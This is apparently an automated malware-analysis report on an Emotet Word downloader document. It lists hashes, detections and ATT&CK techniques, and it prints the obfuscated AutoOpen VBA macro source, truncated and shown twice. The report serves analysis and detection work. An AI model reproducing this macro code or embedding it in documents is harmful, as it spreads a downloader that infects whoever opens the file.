Emotet Office (OLE) malware analysis — malicious · 29e2f8bc62fe973b

MALICIOUS

Office (OLE)

126.1 KB Created: 2018-09-26 18:22:00 Authoring application: Microsoft Office Word First seen: 2018-10-26

MD5: 6cb96140609c2ac70fd7ab1d2ad23377 SHA-1: 4c1b3a959f9386c52ccfe26e4b6e69b8dbd2b8fc SHA-256: 29e2f8bc62fe973b47afaee8c10d8f4e383d72335a63e2e2b129221ab86ef4b4

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The presence of an AutoOpen macro and the ClamAV detection signature 'Doc.Downloader.Emotet-6826437-0' strongly suggest this is a variant of the Emotet downloader. The VBA script is heavily obfuscated but its structure and the heuristic firings point to it being designed to download and execute a secondary payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6826437-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6826437-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 85757 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	85757 bytes
SHA-256: `e1356486685c3b26002fa7f1e1c1f6ece198f0f339148fe42ce8bc8705bf2633`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HfdqmqU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim HqFUdr(1) HqFUdr(0) = Left(AYKBHTUW + WWutpPFKlJPTfASwtMBM + oYoIwpTr, 598) + Right(zOBqPIjQ + FihVTCXZVKtCAMLwqYo + olRIiEU, 921) Dim juGnf(1) juGnf(0) = MidB(ZFLcELBz + VUqMQfAjkOnUBOYwKZfJt + mEkaQJh, 180, 981) + MidB(sTOGHwC + kKOfNkCVpLwNhtHUFGLCmu + iDShGMMw, 545, 803) Dim wSfzTK(1) wSfzTK(0) = Right(XqwKzoqJ + IJnntjGNFHvYQhjjwJrHNw + TUNYwJhS, 939) + MidB(YztGn + bSfcdAGPpRBarnsKhLmqw + iKhFCE, 328, 558) Dim PqqMRT(2) PqqMRT(0) = MidB(BvbRkOGN + YpbhsWwvJnzWAUvCw + rzwpsNZS, 984, 782) + MidB(EfKiw + VXkEoKivtLLftjzDRJWcKw + sqpmzVI, 890, 399) + MidB(IiNRpZod + YiiwuPzuaGBhlGNpXzLqh + DrjDWV, 839, 299) + MidB(HpCGb + hoGwcMvanXOMsVLoTqD + SQzmR, 221, 684) PqqMRT(1) = MidB(lJtWc + klvhTBIHVjunbDwiMOJB + cJaiG, 961, 866) + MidB(iFIDp + hfvipcCjpZQbjhdr + jAXnJis, 570, 407) + Left(NEjdG + UjYCRYWsHVbZwYiXrfd + KpSkKk, 946) + MidB(PXKIdjws + lHubIodwisjqzAGKLHKsi + ORXvYwr, 841, 971) OOwqwBZMknZO (KeyString(HunJQhi + LKrhcf + 17 + 13 + 37 + bkHnT + HEjBj) + rvpzL + VMbLNsHp + KeyString(hYUNUEs + jBMwd + 20 + 15 + 42 + FTwsi + PGYjb) + rldmM + hIWRsP + zCpiA + iHadfhVdNVX + UqBKqEut + zAAlbHOFFu + kpjKwvlVulj + JvjEwv + jNImGrh) Dim aPQRja(1) aPQRja(0) = Left(DJusw + bOzOiDMaiuAJlohNXAAwc + wvlJnh, 295) + MidB(suTzb + pnlaBWcdclaiUtJGQL + MkkawmzR, 732, 175) Dim JquTZ(1) JquTZ(0) = MidB(fKwop + ZZoUzGZYpQwRqjLAPIdzp + DkjQwvp, 411, 247) + MidB(RLblNSE + PSzzzWpSwZwoOQItVGwdH + GZivLun, 60, 390) Dim jSZFUC(1) jSZFUC(0) = Mid(icwXvwJL + SpsRPQrXkiLlEjqUQm + IDFJB, 659, 968) + Mid(GjBvsPC + dfjUTrCFNTrQkZcjGOIYi + EsWMU, 762, 220) + Mid(NjokN + rljsqwcTBrCbUYOmJiitf + aLvudzzS, 339, 762) + Right(NIQDC + IzpGiQVbNMrDMBVQXuDICT + Bitfba, 684) End Sub Attribute VB_Name = "lFMiIVBEFvvqM" Function rldmM() kwidliVWB = "d \/\\ \ //\/" + "\/ /V:ON/C" + """" + "set +'[{=7a20 07a" + "2 7a20 a720 a" JcGVUClBuJz = "207 a702 2" + "07a a270 0a" + "27 072a 702a 7a20 20" ZiBAwOr = "a7 02a7 a027" + " 07a2 70a2 270a}" + "a720}07a2{720ah7a0" + "2c20a7t70a2a" + "702aca702}a072;" Dim YbMmY(1) YbMmY(0) = Right(UaGSz + jwoAwDRHrlRnwQtNbB + dbYPS, 516) + Left(OEimik + wOGUVBHcFTqYkVlLZYblr + WNFLjVV, 51) + Left(uspbU + NGzoijQwZVdPDqfu + ZwUWTiEc, 933) + Mid(cSXkR + AWujvAjvipwwaYPiSKif + qRqCGflB, 760, 881) Dim UmXGzw(2) UmXGzw(0) = Left(jOHLkfzO + UMXPBctCJQvzWmTFbpRd + pvvrzq, 832) + Mid(micFlvM + uilPkYRuJdpDiSuLFFTZrYkE + UJPnVjZ, 688, 501) + Right(aCwiZl + JKZPOwqbtqAUZzOChzt + UbfCUrS, 752) + MidB(hVvuA + HUqjLBAbiKiBAQznQnGOaDz + tcEOLCrY, 386, 56) UmXGzw(1) = Left(iOtIHE + RVHANsAGPfMkzdwXwJrf + NmYNFSz, 985) + MidB(YUEAkKq + XzoVUfLjBuapXoTmAz + XiVfZ, 908, 753) Dim fhcdq(1) fhcdq(0) = MidB(SAFsbUC + UpqjjqsjSlWnNdwzYro + rCHZdCS, 705, 365) + MidB(DkproTjt + EfBafzEEdjSFioPhABD + ccoGJ, 108, 140) Dim chuDF(2) chuDF(0) = MidB(LuWDRLUK + tvBhNjhjObtpaCYUUMP + BvufJfpS, 129, 72) + MidB(YpjGjt + QREvrwJpKwiFOjSYBZIn + zwMrOk, 368, 76) chuDF(1) = MidB(krzoMV + wGjJJJOiUKBIjuAwEa + aprwbuM, 240, 602) + Mid(qfjomDd + wtNNFStMZoCGTRNnSV + VinmwFN, 872, 520) OIqDvJvLN = "7a02k270aaa702e" + "270ar0a27ba027" + ";70a2Oa270j207a" + "P270a$07a2" rldmM = kwidliVWB + JcGVUClBuJz + ZiBAwOr + OIqDvJvLN Dim fjTERD(2) fjTERD(0) = Right(CCNdK + XzKDTaThqCUQMmONGPcM + EbRwbrX, 320) + Right(RouQJM + OOjCuQQPwLUvlGbBoFziDwr + bzEtUrwp, 868) fjTERD(1) = Mid(BfkcbFw + hTBKLHfkfFDwSsRAEmR + QAIVW, 70, 962) + MidB(nQIvti + jFNwiNUKinuQlptL + sjhIm, 170, 41) + Left(zjnsDM + mvuAMVzutAXXOBrYjos + NoiEK, 560) + MidB(QaHPD + LXIrPBjzMZrMnuzjmXmF + CwGfsH, 205, 833) Dim DUmYvZ(2) DUmYvZ(0) = MidB(miEDjbmX + qGkFjtczDzIjXPKfmmG + DmlzW, 70, 989) + Right(bKsFz + fTajAdzjkWbsujkFwHtGv + CENXtH, 492) DUmYvZ(1) = Right(TjRAZ + MmjXlvZnWwlNifjbs + qPCFnM, 90) + Right(bGChTOj + JnjXKkCVBlTwwvRVfXiUw + i ... (truncated)

SHA-256: e1356486685c3b26002fa7f1e1c1f6ece198f0f339148fe42ce8bc8705bf2633

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HfdqmqU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim HqFUdr(1)
HqFUdr(0) = Left(AYKBHTUW + WWutpPFKlJPTfASwtMBM + oYoIwpTr, 598) + Right(zOBqPIjQ + FihVTCXZVKtCAMLwqYo + olRIiEU, 921)
   Dim juGnf(1)
juGnf(0) = MidB(ZFLcELBz + VUqMQfAjkOnUBOYwKZfJt + mEkaQJh, 180, 981) + MidB(sTOGHwC + kKOfNkCVpLwNhtHUFGLCmu + iDShGMMw, 545, 803)
   Dim wSfzTK(1)
wSfzTK(0) = Right(XqwKzoqJ + IJnntjGNFHvYQhjjwJrHNw + TUNYwJhS, 939) + MidB(YztGn + bSfcdAGPpRBarnsKhLmqw + iKhFCE, 328, 558)
   Dim PqqMRT(2)
PqqMRT(0) = MidB(BvbRkOGN + YpbhsWwvJnzWAUvCw + rzwpsNZS, 984, 782) + MidB(EfKiw + VXkEoKivtLLftjzDRJWcKw + sqpmzVI, 890, 399) + MidB(IiNRpZod + YiiwuPzuaGBhlGNpXzLqh + DrjDWV, 839, 299) + MidB(HpCGb + hoGwcMvanXOMsVLoTqD + SQzmR, 221, 684)
PqqMRT(1) = MidB(lJtWc + klvhTBIHVjunbDwiMOJB + cJaiG, 961, 866) + MidB(iFIDp + hfvipcCjpZQbjhdr + jAXnJis, 570, 407) + Left(NEjdG + UjYCRYWsHVbZwYiXrfd + KpSkKk, 946) + MidB(PXKIdjws + lHubIodwisjqzAGKLHKsi + ORXvYwr, 841, 971)
OOwqwBZMknZO (KeyString(HunJQhi + LKrhcf + 17 + 13 + 37 + bkHnT + HEjBj) + rvpzL + VMbLNsHp + KeyString(hYUNUEs + jBMwd + 20 + 15 + 42 + FTwsi + PGYjb) + rldmM + hIWRsP + zCpiA + iHadfhVdNVX + UqBKqEut + zAAlbHOFFu + kpjKwvlVulj + JvjEwv + jNImGrh)
   Dim aPQRja(1)
aPQRja(0) = Left(DJusw + bOzOiDMaiuAJlohNXAAwc + wvlJnh, 295) + MidB(suTzb + pnlaBWcdclaiUtJGQL + MkkawmzR, 732, 175)
   Dim JquTZ(1)
JquTZ(0) = MidB(fKwop + ZZoUzGZYpQwRqjLAPIdzp + DkjQwvp, 411, 247) + MidB(RLblNSE + PSzzzWpSwZwoOQItVGwdH + GZivLun, 60, 390)
   Dim jSZFUC(1)
jSZFUC(0) = Mid(icwXvwJL + SpsRPQrXkiLlEjqUQm + IDFJB, 659, 968) + Mid(GjBvsPC + dfjUTrCFNTrQkZcjGOIYi + EsWMU, 762, 220) + Mid(NjokN + rljsqwcTBrCbUYOmJiitf + aLvudzzS, 339, 762) + Right(NIQDC + IzpGiQVbNMrDMBVQXuDICT + Bitfba, 684)
End Sub


Attribute VB_Name = "lFMiIVBEFvvqM"
Function rldmM()
kwidliVWB = "d \/\\  \ //\/" + "\/ /V:ON/C" + """" + "set +'[{=7a20 07a" + "2 7a20 a720 a"
JcGVUClBuJz = "207 a702 2" + "07a a270 0a" + "27 072a 702a 7a20 20"
ZiBAwOr = "a7 02a7 a027" + " 07a2 70a2 270a}" + "a720}07a2{720ah7a0" + "2c20a7t70a2a" + "702aca702}a072;"
Dim YbMmY(1)
YbMmY(0) = Right(UaGSz + jwoAwDRHrlRnwQtNbB + dbYPS, 516) + Left(OEimik + wOGUVBHcFTqYkVlLZYblr + WNFLjVV, 51) + Left(uspbU + NGzoijQwZVdPDqfu + ZwUWTiEc, 933) + Mid(cSXkR + AWujvAjvipwwaYPiSKif + qRqCGflB, 760, 881)
   Dim UmXGzw(2)
UmXGzw(0) = Left(jOHLkfzO + UMXPBctCJQvzWmTFbpRd + pvvrzq, 832) + Mid(micFlvM + uilPkYRuJdpDiSuLFFTZrYkE + UJPnVjZ, 688, 501) + Right(aCwiZl + JKZPOwqbtqAUZzOChzt + UbfCUrS, 752) + MidB(hVvuA + HUqjLBAbiKiBAQznQnGOaDz + tcEOLCrY, 386, 56)
UmXGzw(1) = Left(iOtIHE + RVHANsAGPfMkzdwXwJrf + NmYNFSz, 985) + MidB(YUEAkKq + XzoVUfLjBuapXoTmAz + XiVfZ, 908, 753)
   Dim fhcdq(1)
fhcdq(0) = MidB(SAFsbUC + UpqjjqsjSlWnNdwzYro + rCHZdCS, 705, 365) + MidB(DkproTjt + EfBafzEEdjSFioPhABD + ccoGJ, 108, 140)
   Dim chuDF(2)
chuDF(0) = MidB(LuWDRLUK + tvBhNjhjObtpaCYUUMP + BvufJfpS, 129, 72) + MidB(YpjGjt + QREvrwJpKwiFOjSYBZIn + zwMrOk, 368, 76)
chuDF(1) = MidB(krzoMV + wGjJJJOiUKBIjuAwEa + aprwbuM, 240, 602) + Mid(qfjomDd + wtNNFStMZoCGTRNnSV + VinmwFN, 872, 520)
OIqDvJvLN = "7a02k270aaa702e" + "270ar0a27ba027" + ";70a2Oa270j207a" + "P270a$07a2"
rldmM = kwidliVWB + JcGVUClBuJz + ZiBAwOr + OIqDvJvLN
   Dim fjTERD(2)
fjTERD(0) = Right(CCNdK + XzKDTaThqCUQMmONGPcM + EbRwbrX, 320) + Right(RouQJM + OOjCuQQPwLUvlGbBoFziDwr + bzEtUrwp, 868)
fjTERD(1) = Mid(BfkcbFw + hTBKLHfkfFDwSsRAEmR + QAIVW, 70, 962) + MidB(nQIvti + jFNwiNUKinuQlptL + sjhIm, 170, 41) + Left(zjnsDM + mvuAMVzutAXXOBrYjos + NoiEK, 560) + MidB(QaHPD + LXIrPBjzMZrMnuzjmXmF + CwGfsH, 205, 833)
   Dim DUmYvZ(2)
DUmYvZ(0) = MidB(miEDjbmX + qGkFjtczDzIjXPKfmmG + DmlzW, 70, 989) + Right(bKsFz + fTajAdzjkWbsujkFwHtGv + CENXtH, 492)
DUmYvZ(1) = Right(TjRAZ + MmjXlvZnWwlNifjbs + qPCFnM, 90) + Right(bGChTOj + JnjXKkCVBlTwwvRVfXiUw + i
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.